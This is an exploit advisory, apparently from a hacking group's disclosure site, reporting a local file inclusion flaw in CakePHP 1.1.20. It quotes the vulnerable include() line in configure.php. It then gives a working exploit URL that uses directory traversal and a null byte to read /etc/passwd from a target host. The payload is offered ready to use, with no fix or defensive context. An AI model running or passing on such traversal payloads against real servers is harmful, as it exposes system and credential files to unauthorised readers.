++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                               	 +
        +          CakePHP 1.1.20 Local File Inclusion Vulnerability         +
        +                                                                    +
        +                     Discovered by Cru3l.b0y                        +
        +                                                                    +
        +                       WwW.DeltaHacking.Net                         +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################################################################
AUTHOR      : Cru3l.b0y
APPLICATION : CakePHP
VERSION     : 1.1.20
DOWNLOAD    : http://cakeforge.org/frs/download.php/677/cake_1.1.20.7692.tar.gz/donation=complete
VENDOR      : http://cakeforge.org/
###################################################################################################


Vulnerable Code :
###################################################################################################
/cake/libs/configure.php																	
																							
215    include(CONFIGS . $fileName . '.php');												
																							
                                                                                            
[+]Exploit: http://[t4rg3t]/[p4th]/cake/libs/configure.php?fileName=../../../etc/passwd%00 
###################################################################################################